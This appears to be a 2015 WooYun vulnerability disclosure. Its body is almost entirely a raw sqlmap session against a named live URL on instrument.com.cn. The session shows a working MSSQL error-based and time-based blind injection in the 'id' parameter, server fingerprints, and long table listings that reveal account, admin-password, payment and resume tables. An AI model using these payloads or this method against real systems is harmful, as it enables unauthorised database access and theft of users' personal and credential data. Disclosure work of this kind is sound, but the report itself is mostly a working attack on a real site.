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漏洞作者: 漩涡鸣人

提交时间:2015-05-22 11:31

修复时间:2015-05-27 11:32

公开时间:2015-05-27 11:32





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经主动忽略漏洞,细节向公众公开






root@bogon:~# sqlmap -u "www.instrument.com.cn/webinar/meeting/factoryMeeting?id=sh100243&adid=29" -D "20150212,IM_CRM,IM_Count,IM_Webinar,INSExpress,IP,MobileNews,WOYAOCE,bbs,company,edm,i3t,ilog,instruemnt_Statistics,instrument,instrument2,journal,log,master,model,msdb,netin,sms,tempdb,vip_account" --tables
[*] starting at 20:54:21
[20:54:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:54:21] [INFO] testing connection to the target URL
[20:54:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: id (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=sh100243') AND 5866=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5866=5866) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))) AND ('EoLy'='EoLy&adid=29id=sh100243
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=sh100243') AND 5974=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('sHVE'='sHVE&adid=29id=sh100243
[20:54:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[20:54:21] [INFO] fetching tables for databases: 20150212, IM_CRM, IM_Count, IM_Webinar, INSExpress, IP, MobileNews, WOYAOCE, bbs, company, edm, i3t, ilog, instruemnt_Statistics, instrument, instrument2, journal, log, master, model, msdb, netin, sms, tempdb, vip_account
[20:54:21] [WARNING] reflective value(s) found and filtering out
[20:54:21] [WARNING] the SQL query provided does not return any output
[20:54:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:54:21] [INFO] the SQL query used returns 4 entries
[20:54:22] [INFO] the SQL query used returns 14 entries
[20:54:31] [INFO] the SQL query used returns 14 entries
[20:54:31] [INFO] resumed: IM_CRM_Customer_Account
[20:54:31] [INFO] resumed: IM_CRM_Customer_Mailing
[20:54:31] [INFO] resumed: IM_CRM_Invoice
[20:54:31] [INFO] resumed: IM_CRM_Invoice_Back
[20:54:31] [INFO] resumed: IM_CRM_Mailing
[20:54:31] [INFO] resumed: IM_CRM_Mailing_Invoice
[20:54:31] [INFO] resumed: IM_CRM_Pay_Accountant
[20:54:31] [INFO] resumed: IM_CRM_Pay_Bank
[20:54:31] [INFO] resumed: IM_CRM_Pay_Type
[20:54:31] [INFO] resumed: Sys_OperateLog
[20:54:31] [INFO] resumed: T_Travel
[20:54:31] [INFO] resumed: T_TravelCode
[20:54:31] [INFO] resumed: T_TravelFile
[20:54:31] [INFO] resumed: tempTABLE
[20:54:31] [INFO] the SQL query used returns 3 entries
[20:54:31] [INFO] resumed: news_pv_year_2014
[20:54:31] [INFO] resumed: show_paper_pv_2014
[20:54:31] [INFO] resumed: show_tel_400_year
[20:54:31] [INFO] the SQL query used returns 35 entries
[20:54:51] [INFO] the SQL query used returns 35 entries
[20:54:51] [WARNING] the SQL query provided does not return any output
[20:54:52] [WARNING] the SQL query provided does not return any output
[20:54:52] [INFO] the SQL query used returns 1 entries
[20:54:52] [INFO] resumed: dbo.IPInfo
[20:54:52] [WARNING] the SQL query provided does not return any output
[20:54:52] [WARNING] the SQL query provided does not return any output
[20:54:52] [INFO] the SQL query used returns 4 entries
[20:54:53] [INFO] the SQL query used returns 4 entries
[20:54:53] [INFO] resumed: test_TopicMain
[20:54:53] [INFO] resumed: test_TopicModuleInfo
[20:54:53] [INFO] resumed: test_TopicModuleMain
[20:54:53] [INFO] resumed: test_TopicModuleShow
[20:54:53] [INFO] the SQL query used returns 27 entries
[20:54:54] [WARNING] the SQL query provided does not return any output
[20:54:54] [WARNING] the SQL query provided does not return any output
[20:54:54] [INFO] the SQL query used returns 32 entries
[20:54:54] [WARNING] the SQL query provided does not return any output
[20:54:54] [WARNING] the SQL query provided does not return any output
[20:54:54] [INFO] the SQL query used returns 33 entries
[20:54:54] [INFO] the SQL query used returns 17 entries
[20:55:03] [INFO] the SQL query used returns 17 entries
[20:55:03] [INFO] resumed: IM_Behavior_ArearCharacter
[20:55:03] [INFO] resumed: IM_Behavior_COMServiceUsed
[20:55:03] [INFO] resumed: IM_Behavior_ShowYears
[20:55:03] [INFO] resumed: IM_Count_VisiteInfo
[20:55:03] [INFO] resumed: netshow_ChangestypeNetshow
[20:55:03] [INFO] resumed: netshow_FreeAction
[20:55:03] [INFO] resumed: netshow_FreeVisitCount
[20:55:03] [INFO] resumed: netshow_HistoryAction
[20:55:03] [INFO] resumed: netshow_HistoryAentList
[20:55:03] [INFO] resumed: netshow_historyFreeCount
[20:55:03] [INFO] resumed: netshow_historyGuestBookLess5
[20:55:03] [INFO] resumed: netshow_HistoryLinkMan
[20:55:03] [INFO] resumed: netshow_HistorySortList
[20:55:03] [INFO] resumed: netshow_HistorySTypeList
[20:55:03] [INFO] resumed: netshow_InfoIntegrityCount
[20:55:03] [INFO] resumed: netshow_thisMonthLoseComany
[20:55:03] [INFO] resumed: vipnosql
[20:55:03] [INFO] the SQL query used returns 1655 entries
[20:55:55] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request
[20:56:39] [WARNING] user aborted during enumeration. sqlmap will display partial output
[20:56:39] [INFO] the SQL query used returns 1132 entries
[20:56:48] [INFO] retrieved: IM_Admin_User
[20:56:59] [INFO] retrieved: IM_AdminSalesteam
[20:56:59] [WARNING] the SQL query provided does not return any output
[20:57:00] [WARNING] the SQL query provided does not return any output
[20:57:00] [WARNING] the SQL query provided does not return any output
[20:57:00] [WARNING] the SQL query provided does not return any output
[20:57:00] [INFO] the SQL query used returns 218 entries
[20:57:00] [INFO] the SQL query used returns 5 entries
[20:57:00] [INFO] resumed: spt_fallback_db
[20:57:00] [INFO] resumed: spt_fallback_dev
[20:57:00] [INFO] resumed: spt_fallback_usg
[20:57:00] [INFO] resumed: spt_monitor
[20:57:00] [INFO] resumed: spt_values
[20:57:01] [WARNING] the SQL query provided does not return any output
[20:57:01] [WARNING] the SQL query provided does not return any output
[20:57:01] [INFO] the SQL query used returns 9 entries
[20:57:01] [INFO] resumed: backupfile
[20:57:01] [INFO] resumed: backupmediafamily
[20:57:01] [INFO] resumed: backupmediaset
[20:57:01] [INFO] resumed: backupset
[20:57:01] [INFO] resumed: logmarkhistory
[20:57:01] [INFO] resumed: restorefile
[20:57:01] [INFO] resumed: restorefilegroup
[20:57:01] [INFO] resumed: restorehistory
[20:57:01] [INFO] resumed: suspect_pages
[20:57:01] [WARNING] the SQL query provided does not return any output
[20:57:02] [WARNING] the SQL query provided does not return any output
[20:57:02] [WARNING] the SQL query provided does not return any output
[20:57:02] [WARNING] the SQL query provided does not return any output
[20:57:02] [INFO] the SQL query used returns 54 entries
[20:57:32] [INFO] the SQL query used returns 54 entries
Database: IM_CRM
[14 tables]
| IM_CRM_Customer_Account |
| IM_CRM_Customer_Mailing |
| IM_CRM_Invoice |
| IM_CRM_Invoice_Back |
| IM_CRM_Mailing |
| IM_CRM_Mailing_Invoice |
| IM_CRM_Pay_Accountant |
| IM_CRM_Pay_Bank |
| IM_CRM_Pay_Type |
| Sys_OperateLog |
| T_Travel |
| T_TravelCode |
| T_TravelFile |
| tempTABLE |
Database: IM_Count
[3 tables]
| news_pv_year_2014 |
| show_paper_pv_2014 |
| show_tel_400_year |
Database: log
[218 tables]
| AD_LogClick |
| AD_LogView |
| BBS_WapTopicCount |
| CRM_ContactDegree |
| Consumble_CompanyRefresh |
| Consumble_LogIMSortType |
| Consumble_LogIMType |
| Consumble_LogMonthCount |
| Consumble_ProductKeyWord |
| Gift_Company |
| Gift_Company_history |
| Gift_Company_history2008_2013 |
| HA_Hits_Log |
| IM_ClickUserLog |
| IM_History_Paper |
| IM_History_Show |
| IM_History_ShowNews |
| IM_History_ShowNewsxx |
| IM_IS_ShowB_Spam |
| IM_LogColumn_Visit |
| IM_LogGift |
| IM_LogGuestBook_ByDay |
| IM_LogIMListID |
| IM_LogIMSHowbCharacter |
| IM_LogParts |
| IM_LogParts_Visit |
| IM_LogSearch |
| IM_LogSearchEngine |
| IM_LogSearchReport |
| IM_LogSearch_2003_2009 |
| IM_LogSearch_2010_2013 |
| IM_LogSearch_Gather |
| IM_LogSearch_Gather_B |
| IM_LogSearch_Gather_BySort |
| IM_LogSearch_Gather_Noise |
| IM_LogSearch_Gather_Through |
| IM_LogSearch_Noref |
| IM_LogSearch_Sort |
| IM_LogShowB |
| IM_LogShowB_History |
| IM_LogShowB_Noise |
| IM_LogShowB_Spam |
| IM_LogShowB_Visit |
| IM_LogShow_Visit |
| IM_LogShow_VisitByArea |
| IM_LogShow_VisitByLog |
| IM_LogShow_Visit_ByDay |
| IM_LogTag |
| IM_LogZC |
| IM_LogZCTest |
| IM_LogZC_ByDay |
| IM_SHow_SolutionsLog |
| IM_ShowB |
| IM_ShowB_3iLog |
| IM_ShowB_3iLog_Day |
| IM_Show_Score_MonthLog |
| IM_Show_VisitCount_MonthLog |
| IM_WeiboWall |
| IU_User_log |
| Log_sendlist |
| ML_Action |
| ML_Column |
| ML_EZine |
| ML_Link |
| ML_LinkLog |
| ML_List |
| ML_Log |
| ML_Mail |
| ML_Publish |
| ML_VIPNotLogin_LinkLog |
| ML_VIP_Log |
| ML_VipNotLogin_Log |
| NewsRankboard |
| NewsRankboardScore |
| PaperDownloadLog |
| SH100000_1227 |
| SH100162 |
| SH100214 |
| SH100214_0413 |
| SH100320 |
| SH100567 |
| SH100572 |
| SH100675 |
| SH100728_0820 |
| SH100728_0820_1 |
| SH100728_0820_2 |
| SH100776 |
| SH100776_0517 |
| SH100776_0808 |
| SH100776_1020 |
| SH101011 |
| SH101011_0831 |
| SH101196_0914 |
| SH101234 |
| SH101234_0110 |
| SH101445 |
| SH101831 |
| SH101831_1009 |
| SH102206 |
| SS_BoardGLCount |
| SS_BoardRewardLog |
| SS_BoardZero |
| SS_ClassBMCount |
| SS_ClassCount |
| SS_ClassGLCount |
| SS_ExpertBoardCount |
| SS_ExpertCount |
| SS_Master_GongZi |
| SS_Master_GongZiBUFABUFA |
| SS_UserByMonth |
| SS_WeekRankboard |
| SS_XunShiCount |
| SearchBaiDuWord |
| SearchListener |
| ShowBBS_BMCount |
| Show_BBS_BoardCount |
| Show_IM_LogZC |
| Show_MasterAction |
| Show_Paper_Download_year |
| Show_Paper_dowload |
| Show_VipOnlineTime_LastDay |
| Show_VipScore |
| Show_VipScore_LastWeek |
| VIEW1 |
| VIEW2 |
| VIPActiveSleeping |
| VIPActiveSleepingType |
| VIPBehaviorClass |
| VIPBehaviorIMGestBookTrace |
| VIPBehaviorLogin |
| VIPBehaviorLoginTrace |
| VIPBehaviorTrace |
| VIPBehaviorTrace20121122 |
| VIPLogNewIndustry |
| VIPLogNewJobPosition |
| VIPLoginNumCount |
| VIPLoginSource |
| VIPLoginSourceByuserid |
| VIPLoginSourceNoInfo |
| VIPLoginSourceType |
| VIPMonthCount_User |
| VIPRegSource |
| VIP_AskLog |
| VIP_FameStatHistory |
| VIP_GestBookIMSource |
| VIP_HasLogin |
| VIP_KnowledgeStatHistory |
| VIP_MemberLevelStatHistory |
| VIP_NewRegLog |
| VIP_NoInfoLogin |
| VIP_ScoreStatHistory |
| VIP_SpamLog |
| View_1 |
| View_ttt |
| VipEmailChildType |
| VipEmailType |
| VipScore |
| VipScore_LTS |
| VipScore_Temp |
| VipScore_Type |
| Vip_EmailRegLog |
| ZC_AllMonthCount |
| ZC_LogActionList |
| ZC_LogActionType |
| ZC_LogDayCount |
| ZC_LogMonthCount |
| ZC_VisitCount_MonthLog |
| PaperDownloadLog-ceshi |
| consumables_stit_monthCompanyCount |
| consumables_stit_monthIMGuestBookCount |
| dtproperties |
| email_research |
| index_bbs_netshow |
| log_Operate |
| log_OperateClass |
| paper_Rankboard |
| paper_addscore |
| paper_downloadlog |
| perkinelmer |
| qut_LogActionList |
| qut_LogActionType |
| qut_ReferrProduct |
| qut_monthtj |
| repaper_history |
| sh100191 |
| sh100233 |
| sh100365 |
| sh100397 |
| sh101380 |
| show_pp |
| show_tt |
| small_temp |
| sqltoredis |
| ss_BMBoardCount |
| ss_BMBoardCount_linshi |
| ss_BMCount |
| ss_BMCount1 |
| ss_BoardCount |
| ss_BoardCount1 |
| ss_DayRankboard |
| ss_MonthRankboard |
| ss_masterAction |
| ss_masterActionName |
| t |
| temp_visite |
| test_user_month_click |
| ttt |
| vipLoginHistory |
| vipScore_history |
| vip_Count_Email |
| vip_EmailRegLog_ChildClass |
| vip_EmailRegLog_EmailClass |
| vip_InviteFriendsCount |
| vip_loginErr |
| vip_platLog |
| vip_postbbsErr |
| vip_reg_err |
| vip_score_month_count |
Database: IP
[1 table]
| IPInfo |
Database: instruemnt_Statistics
[17 tables]
| IM_Behavior_ArearCharacter |
| IM_Behavior_COMServiceUsed |
| IM_Behavior_ShowYears |
| IM_Count_VisiteInfo |
| netshow_ChangestypeNetshow |
| netshow_FreeAction |
| netshow_FreeVisitCount |
| netshow_HistoryAction |
| netshow_HistoryAentList |
| netshow_HistoryLinkMan |
| netshow_HistorySTypeList |
| netshow_HistorySortList |
| netshow_InfoIntegrityCount |
| netshow_historyFreeCount |
| netshow_historyGuestBookLess5 |
| netshow_thisMonthLoseComany |
| vipnosql |
Database: WOYAOCE
[4 tables]
| test_TopicMain |
| test_TopicModuleInfo |
| test_TopicModuleMain |
| test_TopicModuleShow |
Database: vip_account
[54 tables]
| VIP_BaseInfo |
| VIP_EmailReg |
| VIP_MSNLogin |
| VIP_MobileCodeHistory |
| VIP_MobileReg |
| VIP_QQLogin |
| VIP_RenrenLogin |
| VIP_SinaLogin |
| Vip_Feedback |
| ipinfo |
| ipinfo2 |
| sendVip_mobile |
| vip_account2014temp |
| vip_account_0 |
| vip_account_1 |
| vip_account_2 |
| vip_account_3 |
| vip_account_4 |
| vip_account_5 |
| vip_account_6 |
| vip_account_7 |
| vip_account_8 |
| vip_account_9 |
| vip_account_a |
| vip_account_b |
| vip_account_c |
| vip_account_d |
| vip_account_del2014 |
| vip_account_e |
| vip_account_f |
| vip_account_g |
| vip_account_h |
| vip_account_i |
| vip_account_j |
| vip_account_k |
| vip_account_l |
| vip_account_m |
| vip_account_n |
| vip_account_o |
| vip_account_other |
| vip_account_p |
| vip_account_q |
| vip_account_r |
| vip_account_s |
| vip_account_t |
| vip_account_u |
| vip_account_underline |
| vip_account_v |
| vip_account_w |
| vip_account_x |
| vip_account_y |
| vip_account_z |
| vip_getpassword |
| vip_history_nickname |
Database: msdb
[9 tables]
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
Database: edm
[32 tables]
| Line_activities |
| ML_Action |
| ML_Column |
| ML_EZine |
| ML_Link |
| ML_LinkLog |
| ML_List |
| ML_Log |
| View_Freeze_SendList |
| View_edm_FreezeEmail |
| Waste_List |
| edm_ApplyMail |
| edm_FreezeEmail |
| edm_FreezeEmail_bakeup |
| edm_MID_SendCount |
| edm_MID_SendList |
| edm_MID_SendList_Temp |
| edm_MainSort |
| edm_RemindMobile |
| edm_SearchList |
| edm_SearchName |
| edm_SearchName_bakeup |
| edm_Sort |
| edm_SortClass |
| edm_TempEmail |
| edm_View_relatedTable |
| edm_manager |
| edm_relatedTable |
| edm_templateHtml |
| email |
| mailList_Temp |
| sysdiagrams |
Database: instrument
[1132 tables]
| AD_BuyerType |
| AD_ColumnRank_Type |
| AD_DefaultFile |
| AD_File |
| AD_Format |
| AD_Key |
| AD_Manager |
| AD_Random_History |
| AD_Random_Keyword |
| AD_Random_Order |
| AD_Random_VipHistory |
| APP_VersionInfo |
| Ad_Column |
| Ad_Location |
| Ad_Page |
| Admin_ManagerMenu |
| Admin_UserMenuLimits |
| Auction_BaoMing |
| Auction_Count |
| BBS_Activities |
| BBS_ActivitiesLog |
| BBS_ActivitiesPrize |
| BBS_ActivitiesTopic |
| BBS_Caption |
| BBS_Qgroup |
| BBS_QgroupArtClass |
| BBS_QgroupAttachment |
| BBS_QgroupClass |
| BBS_QgroupData |
| BBS_QgroupLink |
| BBS_QgroupNotice |
| BBS_QgroupNumber |
| BBS_QgroupPaper |
| BBS_QgroupPaperClass |
| BBS_QgroupTopics |
| BBS_QgroupVisitLog |
| BBS_QgroupVote |
| BBS_QgroupVoteUser |
| BBS_SeoTopicKeyWordAndForum |
| BBS_SeoTopicUserKeyWordAndForum |
| BBS_SeoTopickeyWord |
| BBS_SeoTopickeyWordUser |
| BBS_SeolinkUrl |
| BBS_VIPAsk |
| BEmail |
| BID_Instrument |
| BID_InstrumentInfo |
| Bid_Company |
| BusinessSortGold |
| BusinessVisit |
| CAIA_Admin |
| CAIA_Declare |
| CAIA_Declare_Expert |
| CAIA_Expert |
| CONF_BInfo |
| CONF_Down |
| CONF_News |
| CONF_Papering |
| CONF_Plan |
| CONF_Register |
| CONF_Register_List |
| CONF_Support |
| CONF_Topic |
| CRM_Budget |
| CRM_ContactDegree |
| CRM_Cooperation |
| CRM_LevelClass |
| CRM_LevelHistory |
| CRM_LevelIM |
| CRM_LevelIMAdminInput |
| CRM_LevelOutput |
| CanZhan |
| Comment_Ding |
| Comment_Info |
| Comment_Score |
| Comment_Table |
| Consumables_MaxKeywords |
| Consumables_MaxRank |
| Consumables_Promotion |
| Consumble_CompanyRefresh |
| DisplayBoards |
| DisplayBoardsContent |
| DisplayBoardsModular |
| DisplayBoardsNavigation |
| DisplayBoardsShopSign |
| DisplayBoardsStyle |
| EXP_File |
| EXP_Info |
| EXP_Instrument |
| EXP_Record |
| Earthquake_experience |
| EmailBusinessInfo |
| Exhibition |
| Exhibition_AD |
| Exhibition_GuestBook |
| Exp_InnerBBS1 |
| Exp_InnerBoard |
| ExpertForum |
| Fee |
| Gift_Coupon |
| Gift_Fund |
| Gift_FundCount |
| Gift_Station_Vote |
| Gift_VoteGroup |
| GuanZhan |
| HA_AdLocation |
| HA_Class |
| HA_ClassContent |
| HA_ClassContent_temp_temp |
| HA_Comment |
| HA_Focus |
| HA_IMClass |
| HA_Industry |
| HA_IndustrySort |
| HA_Info |
| HA_Proposal |
| HA_Sort |
| HA_Sort2 |
| HA_Type |
| HA_Type_Paper |
| HA_Type_Paper_Result |
| HA_Type_Paper_ShowB |
| HA_Type_Paper_Video |
| ILOG_Article |
| ILOG_ArticleType |
| ILOG_Attachment |
| ILOG_Config |
| ILOG_Image |
| ILOG_ImageType |
| ILOG_Restore |
| IMListCreditLog |
| IM_APPInfo |
| IM_APPInfo_Status_Log |
| IM_Abbreviation |
| IM_Activity |
| IM_AdminGroup |
| IM_AdminGroupModule |
| IM_AdminGroupUser |
| IM_AdminModule |
| IM_AdminSalesFunnel |
| IM_AdminSalesteam |
| IM_AdminSalesteamMember |
| IM_Admin_BS_District |
| IM_Admin_Department |
| IM_Admin_Item |
| IM_Admin_ItemGroup |
| IM_Admin_Pass |
| IM_Admin_Permission |
| IM_Admin_Title |
| IM_Admin_User |
| IM_Admin_User_ZCList |
| IM_AgentCommend |
| IM_AgentSort |
| IM_Area |
| IM_Auction_List |
| IM_Auction_List_bak |
| IM_Auction_Log |
| IM_Auction_Mobile |
| IM_Auction_Mobile_2013 |
| IM_Auction_Online |
| IM_Auction_Online_IP |
| IM_Auction_Order |
| IM_Auction_Permission |
| IM_Auction_Time |
| IM_Auction_Tip |
| IM_Auction_Type |
| IM_BI_Monitor_Keyword |
| IM_BI_Monitor_List |
| IM_BI_Monitor_Search |
| IM_BroadCast |
| IM_Business |
| IM_Business_SendEmailQueue |
| IM_Business_StatusQueue |
| IM_BuyingNews |
| IM_CRM_Contract |
| IM_CRM_Contract_CodeType |
| IM_CRM_Contract_Invoice |
| IM_CRM_Contract_Invoice_Back |
| IM_CRM_Contract_Service |
| IM_CRM_Contract_ServiceType |
| IM_CRM_Flaunt_RType |
| IM_CRM_Info |
| IM_CRM_InfoSources |
| IM_CRM_Level |
| IM_CRM_Linkman |
| IM_CRM_Log |
| IM_CRM_Log_Qulification |
| IM_CRM_Mailing |
| IM_CRM_Mailing_Back |
| IM_CRM_Mailing_ExpressCompany |
| IM_CRM_Mailing_Invoice |
| IM_CRM_Mailing_PostType |
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| IM_CRM_Pay_Accountant |
| IM_CRM_Pay_Accountant_Invoice |
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| IM_CRM_Pay_Type |
| IM_CRM_Quotation |
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| IM_CRM_SaleChances |
| IM_CRM_SaleChances_ComeFrom |
| IM_CRM_SaleChances_Info |
| IM_CRM_SaleChances_PurchaseWill |
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| IM_Column_Type |
| IM_CompanyRootSort |
| IM_CompanySort |
| IM_Company_AgentSort |
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| IM_Field |
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| IM_Flaut_Recormmend |
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| IM_GuestBookOverTen |
| IM_GuestBookProductLog |
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| IM_Images |
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| IM_IndustryClass |
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| IM_Investigate |
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| IM_Invoice |
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| IM_List_Statistics |
| IM_List_Statistics_BusinessMail |
| IM_List_Statistics_BusinessMailReport |
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| IM_List_Statistics_ZongHe |
| IM_LogBid |
| IM_LogConsumed |
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| IM_LogJob |
| IM_LogShow |
| IM_MOdCom_Apply |
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| IM_Message_Template |
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| IM_Price_Gift |
| IM_Product |
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| IM_Qualification_pic_bak |
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| IM_ShowB_NewProduct_Commend |
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| IM_ShowB_NewProduct_News |
| IM_ShowB_NewProduct_Prove |
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| IM_ShowB_NewProduct_ReviewItem |
| IM_ShowB_NewProduct_ReviewItemResult |
| IM_ShowB_NewProduct_bak |
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| IM_ShowB_RelatedParts |
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| IM_ShowB_greenProduct_Evaluation |
| IM_ShowIndexShowb |
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| IM_WeiXin |
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| IM_WeiXin_Code_Log |
| IM_WeiXin_DaKa |
| IM_WeiXin_IMShow_Auth |
| IM_WeiXin_IMShow_Bind |
| IM_WeiXin_IMShow_Code_Log |
| IM_WeiXin_Invite_Code |
| IM_WeiXin_Login_Log |
| IM_WeiXin_Score_Log |
| IM_WeiXin_Text_Answer |
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| IM_ZC_IndustryIndex |
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| IM_guestbookT |
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| IP |
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| IU_IM_CRM_Pay |
| IU_IM_CRM_Pay_Accountant |
| IU_IM_LogConsumed |
| IU_IM_Order_Detail |
| IU_IM_Order_Info |
| IU_IM_Order_Main |
| IU_IM_Order_Merchandize_Price |
| IU_TransformAdmin |
| IU_User |
| IU_Work_Class |
| IU_Work_Grade |
| IU_Works_Class |
| Im_GuestbookComLog |
| Im_GuestbookNoProduct |
| Im_GuestbookZCTJLog |
| Im_Introduce |
| Im_feedback |
| IndustryTypes |
| Info_Notice |
| InnerAdmin |
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| InnerUser |
| Introduction |
| Invest_FiltrateSetting |
| Invest_Report |
| Invest_YearService |
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| JOB_Invite_backup |
| JOB_News |
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| Job_BlackCompany |
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| Job_Journal |
| Job_Journal_News |
| Job_Resume_Apply |
| Job_Resume_Edu |
| Job_Resume_Item |
| Job_Resume_Practice |
| Job_Resume_Project |
| Job_Resume_TempSave |
| Job_Resume_Train |
| Job_Resume_User |
| Job_Resume_View |
| Job_Resume_Works |
| Job_Resume_read |
| Job_Special |
| Job_Special_FeedBack |
| Job_Special_History |
| Job_Special_Job |
| Job_Special_Menu |
| Job_Special_User |
| Job_ViewResume_Log |
| Job_clickLog |
| LE_Number |
| LE_Title |
| LT_Info |
| ML_Info |
| ML_User |
| MailAttach |
| MailCategory |
| MailList |
| Meeting |
| Meeting_File |
| Meeting_Home |
| Meeting_Notice |
| Meeting_Person |
| Meeting_Query |
| Meeting_Query_Item |
| Meeting_Subject |
| Meeting_Type |
| Meeting_User_Info |
| Meeting_blacklist |
| Millipore |
| MobileLog |
| MobileUser |
| MobileUserStatus |
| Mobile_APP_InstallPresent_Log |
| Mobile_WAP_15thAnniversary_log |
| Mobile_WAP_2014InstrumentManufacturerTop10 |
| Mobile_WAP_2014InstrumentManufacturerTop10_Log |
| Mobile_WAP_ShowClick_Log |
| Mrc_Company |
| Mrc_ICSubordinate |
| Mrc_Instrument |
| NetIn |
| NewProductFocus |
| NewProductFocusClass |
| News |
| News_Comment_user |
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| News_Detail |
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| News_HeadRelated |
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| News_Headlines |
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| News_Keywords |
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| News_NType |
| News_Rwzf_Commend |
| News_Rwzf_IndexShow |
| News_Rwzf_pic |
| News_Sort |
| News_Subject |
| News_Subject_Focus |
| News_TS |
| News_TS_Img |
| News_TS_Main |
| News_Votes |
| News_VotesItem |
| News_vote_user |
| OfficeBrowseHistory |
| PaperAttachment |
| Paper_Down_Type |
| Paper_Free |
| Paper_Keywords |
| Paper_NoFreeDownCount |
| Paper_Result |
| Paper_Result_Sort |
| Paper_Result_Sort1 |
| Paper_Results_Paramaters |
| Paper_Results_ParamatersInfo |
| Paper_ShowB_User |
| Paper_Sort_Level1 |
| Paper_Sort_Level11 |
| Paper_Sort_Level2 |
| Paper_Sort_Level3 |
| Person_FavPosts |
| Person_MatchBoardName |
| Person_RemindMessage |
| ProductInspect |
| ProductTest |
| ProductTypeAttribute |
| ProductTypeSource |
| Publicize |
| Q_UserAnswer |
| Qut_Cart |
| Qut_Keywords |
| Qut_Order |
| Qut_Paper |
| Qut_Promotion |
| Qut_RelatedZC |
| Qut_Sort |
| Qut_SubSort |
| Qut_info |
| RC_Guestbook |
| RC_IU_User |
| RC_job_invite |
| Range |
| ReagentIDtmp |
| Repaper_Report |
| Repaper_Userful |
| Report_FeedBack |
| Report_Item |
| Report_Order |
| Report_View |
| Resume |
| Resume_favorite |
| Rz |
| SS_BoardAnnounce |
| SS_BoardAnnounce_bak |
| SS_BoardDonateScore |
| SS_BoardLive |
| SS_BoardMaster_Statistics |
| SS_BoardTopicNum |
| SS_BoardTopicNum_hisMonth |
| SS_Board_Master |
| SS_Board_Master_Sort |
| SS_FilterWord |
| SS_Home_Focus |
| SS_Home_FocusClass |
| SS_Home_FocusRelated |
| SS_Home_FocusSort |
| SS_Home_Picture |
| SS_Mamager_Group |
| SS_Mamager_Group_Level |
| SS_Manager_User |
| SS_Manager_User_Log |
| SS_PushExpertInfo |
| SS_PushMailDetail |
| SS_PushMailInfo |
| SS_PushMailToExpert_Log |
| SS_PushMailToExpert_OpenLog |
| SS_PushMailToExpert_ViewLog |
| SS_Rankboard |
| SS_ToppicComment |
| SS_YuanChang |
| SS_YuanChangGroupPerson |
| SS_YuanChangPersonInfo |
| SS_YuanChang_JPLeTou |
| SS_YuanChang_JPLeTouJiangPin |
| SS_YuanChang_contribution |
| SS_YuanChang_tmp |
| SS_YuanChang_vote_user |
| SS_YuanChuangApproval |
| SS_master_Resume |
| Sars_Type |
| SearchResultZero |
| Search_BlackList |
| Search_Lexicon |
| Search_Lexicon_Pack |
| Search_Lexicon_temp |
| Search_News |
| Search_Parts |
| Search_Rank_Parts |
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| Search_RelatedZC |
| Search_Report |
| Search_Satisfaction |
| Search_Semantic_Template |
| Search_Semantic_Template_Detail |
| Search_ShowB |
| Search_Subject |
| Search_Suggest |
| Search_Trade |
| Sensitive_words |
| Sensitive_words_Day |
| Shop_GiftDollarInfo |
| Shop_GiftDollarInfoTemp |
| Shop_GiftIMCom |
| Shop_GiftInfo |
| Shop_GiftInform |
| Shop_GiftState |
| StandardUnscramble |
| TEST_Score |
| TEST_ScoreAction |
| TR_Apply |
| TR_CRM_Contract_Invoice |
| TR_CRM_Pay_Accountant |
| TR_Charg_Type |
| TR_Charg_list |
| TR_Company |
| TR_Down |
| TR_Info |
| TR_Info_Temp |
| TR_RegList |
| TR_RegList_Temp |
| TR_Reg_Source |
| TR_Sort |
| TR_Student |
| TR_Student_TRINo |
| TR_SubSort |
| TR_Summarize |
| TR_Teacher |
| TR_Term |
| TR_notice |
| T_Check_Class |
| T_Check_Small_Class |
| T_Reagent |
| TableSpace |
| Tag |
| TagLexicon |
| TagOther |
| TagRelationship |
| TagSample |
| Tag_Info |
| Temp_2015_Jiang |
| Temp_GoodCN_Star |
| Temp_visits |
| Temptable |
| TestCenterEmail |
| TestSampStandard |
| Test_Ad_Click |
| Test_Ad_Info |
| Test_Ad_Keyword |
| Test_Adjust_Area |
| Test_Adjust_Name |
| Test_Adjust_Service |
| Test_Admin_Authority |
| Test_Admin_Cate |
| Test_Admin_User |
| Test_Calibration_Service_Temp |
| Test_Cate |
| Test_Cate_Home |
| Test_Cate_Keyword |
| Test_Certificate |
| Test_Certificate_Class |
| Test_Check_Service_Index |
| Test_CompanyVisitLog |
| Test_Control |
| Test_CreditLog |
| Test_ErrorFeedBack |
| Test_FieldCode |
| Test_File |
| Test_Food_ProTestItem |
| Test_Food_ProTestStandard |
| Test_Food_Product |
| Test_Help |
| Test_HelpFeedBack |
| Test_Info_20140214 |
| Test_Instrument_Equipment |
| Test_LogShow



版权声明:转载请注明来源 漩涡鸣人@乌云




忽略时间:2015-05-27 11:32


